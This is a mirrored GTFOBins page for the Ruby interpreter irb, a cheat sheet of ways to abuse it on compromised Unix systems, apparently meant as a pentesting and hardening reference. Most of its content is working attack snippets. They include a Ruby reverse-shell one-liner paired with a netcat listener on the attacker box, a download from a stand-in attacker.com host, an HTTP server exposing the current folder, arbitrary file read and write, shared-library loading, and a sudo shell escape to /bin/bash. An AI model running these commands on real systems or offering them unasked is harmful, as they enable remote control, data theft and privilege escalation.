1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/irb.md

43 lines
1.2 KiB
Markdown
Raw Permalink Normal View History

2019-01-03 21:17:38 +01:00
---
functions:
shell:
- code: |
irb
exec '/bin/bash'
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
2019-01-03 21:17:38 +01:00
code: |
export RHOST='127.0.0.1'
export RPORT=9000
irb
require 'socket'; exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read} end
file-upload:
- description: Serve files in the local folder running an HTTP server on port 8888.
2019-01-03 21:17:38 +01:00
code: |
irb
require 'webrick'; WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start;
2019-01-03 21:17:38 +01:00
file-download:
- description: Fetch a remote file via HTTP GET request.
2019-01-03 21:17:38 +01:00
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
2019-01-03 21:17:38 +01:00
irb
require 'open-uri'; download = open(ENV['URL']); IO.copy_stream(download, ENV['LFILE'])
file-write:
- code: |
irb
File.open("file_to_write", "w+") { |f| f.write("DATA") }
file-read:
- code: |
irb
puts File.read("file_to_read")
library-load:
- code: |
irb
require "fiddle"; Fiddle.dlopen("lib.so")
2019-01-03 21:17:38 +01:00
sudo:
- code: |
sudo irb
exec '/bin/bash'
---